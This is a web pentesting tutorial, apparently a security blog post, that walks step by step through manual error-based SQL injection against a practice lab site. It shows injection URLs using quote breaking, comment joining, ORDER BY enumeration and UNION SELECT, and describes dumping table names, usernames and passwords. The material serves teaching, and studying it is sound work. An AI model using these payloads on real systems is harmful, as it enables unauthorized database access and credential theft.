Thursday, December 7, 2023

Web Application Pentesting – Manual SQL Injection With Error Based String Method

SQL injection is the code injection technique to gain access to the database(MySQL, MSSQL, Oracle etc). Owasp 2018 Release still describes this injection as an A1 or Level 1 injection which is the most dangerous attack of all time.

SANS Top 25(Most Dangerous Software Errors) describes SQL injection as Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) as Rank 1 of Injection.

The automation of this injection can be performed with a large number of tools available on the internet. Better than tools Humans have creative thinking and decision-making to understand the target, so I preferred to go with manual penetration.

Also Read SQLMAP-Detecting and Exploiting SQL injection- A Detailed Explanation

NOTE: Scope of this SQL injection only for backend MySQL database. If you test the same with Oracle or some other databases it never works.

SQL Injection ONLINE LAB:

  • Beginners can use this website to practice skills for SQL injection
  • To Access the LAB Click Here
SQL Injection
  • Above Screenshot will be your successful welcome screen.

STEP 1: Breaking the Query

  • Visiting the website http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1
  • Let us add & check single quote to existing URL to check whether the website is vulnerable to SQL Injection by adding http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1′
  • After adding single quote If the website shows error statement  “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1”’ at line 1
SQL Injection
  • That’s Great !!! It is Vulnerable to SQL Injection
  • This Illustrates you have successfully Broken the query & Backend Database is interacting to Hacker with error messages.

STEP 2: Copying the Error Statement

  • Copy and Paste the SQL Error statement into Notepad.
  • After copying Perform actions to error statements as mentioned in the below screenshot
  • Above figure Illlustes that Highlighted single quote is breaking the backend database
  • Now Imagine yourself as DEVELOPER and Guess the SQL statement in Database.
  • Hope everyone has Guessed the backend query looks like this Select username, Password from table where id =’1′
  • When we add single quote which is mismatching the query like this Select username, Password from table where id =’1”
  • This is called as Single quote error based string injection.

STEP 3: Joining the Query

  • Let us add  –+  to join the query http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1′ –+
SQL Injection
  • The above figure illustrates SQL errors are fixed with –+
  • Whatever malicious code is placed will talk with the database and as of now you have successfully broken the query, joined the query, and finally found out it is a Single quote error-based string injection.

STEP 4: Finding the Backend Columns

  • It is time to have a conversation with the database to find the number of columns. To enumerate columns we can use order by command.
SQL Injection

So above figure illustrates no SQL errors, meaning there is 1 column in the database.

  • Let me check with the rest of the columns with an order by 2, order by 3, etc.
SQL Injection

So the above figure illustrates no SQL errors, this shows still 3 columns are present in the database.

  • Let me check with one more column with an order by 4
SQL Injection

Above Figure shows the Database with the error statement Unknown column ‘4’ in ‘the order clause and this error statement says as “There are only 3 columns in the database”.Hope you understand how to talk with a database with errors.

STEP 5: Finding the Backend Tables

  • SQL backend may contain more Tables names with empty data also. Therefore You should first be able to find out which table names are present in these 3 columns.
  • Now we can select all 3 columns with union all select to existing URL http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1′ union all select 1,2,3 –+
SQL Injection
  • The above Illustrated Figure shows Username is: 2 as the value which represents table names is present in the 2nd column of the database. Now we have successfully found the table location in Database.

STEP 6: Finding the Backend Table Names

  • We already knew the location of the table path, so will directly ask database name, version, etc
SQL Injection
SQL Injection
  • Above Illustrated Figure shows Backend Database reveals its database name:leettime_761wHole
  • Let us do the same to check out database version details with version()
SQL Injection
  • The above Illustrated Figure shows the Backend Database version: 5.6.36-cll-lve

STEP 7: Dumping Database Tables

  • Group_concat() is the function that returns a string with the concatenated non-NULL value from a group.
  • So we can use this Function to list all Tables from the database.
  • In Addition, we can use Information_Schema to view metadata about the objects within a database.
SQL Injection
  • The Above Figure shows the dump of all tables as testtable1, user logs, users.

STEP 8: Dumping all Data in Columns of Tables

  • Here I will dump for users in the table.
  • The Above Figure shows the dump of all columns of tables containing id, username, password,user_type,sec_code
  • Here Usernames and Passwords are the most confidential ones. so let us dump  !!!

STEP 9: Dumping all Usernames

  • Here we can dump all usernames in the database.
SQL Injection
  • The Above Figure shows the dump of all usernames injector, decompiler, devil hunter, Zen, Zenodermus, grayhat, khan, admin
  • If I get the credential for an admin account that will be great!

STEP 10: Dumping all Passwords

  • Now we can use the group_concat function to call passwords from users.
SQL Injection
  • The Above Figure shows the dump of all passwords for users: Khan,hacktract,dante,sec-idiots,security-i, hacker, haxor, sadmin
  • We got the admin accounts password as sadmin ! Happy Hacking !!!
Website

Latest articles

Bluetooth keystroke-injection Flaw: A Threat to Apple, Linux & Android Devices

An unauthenticated Bluetooth keystroke-injection vulnerability that affects Android, macOS, and iOS devices has been...

Atlassian Patches RCE Flaw that Affected Multiple Products

Atlassian has been discovered with four new vulnerabilities associated with Remote Code Execution in...

Reflectiz Introduces AI-powered Insights on Top of Its Smart Alerting System

Reflectiz, a cybersecurity company specializing in continuous web threat management, proudly introduces a new...

SLAM Attack Gets Root Password Hash in 30 Seconds

Spectre is a class of speculative execution vulnerabilities in microprocessors that can allow threat...

Akira Ransomware Exploiting Zero-day Flaws For Organization Network Access

The Akira ransomware group, which first appeared in March 2023, has been identified as...

Hackers Deliver AsyncRAT Through Weaponized WSF Script Files

The AsyncRAT malware, which was previously distributed through files with the .chm extension, is now being...

BlueNoroff: New Malware Attacking MacOS Users

Researchers have uncovered a new Trojan-attacking macOS user that is associated with the BlueNoroff APT...

API Attack Simulation Webinar

Live API Attack Simulation

In the upcoming webinar, Karthik Krishnamoorthy, CTO and Vivek Gopalan, VP of Products at Indusface demonstrate how APIs could be hacked.The session will cover:an exploit of OWASP API Top 10 vulnerability, a brute force account take-over (ATO) attack on API, a DDoS attack on an API, how a WAAP could bolster security over an API gateway

Related Articles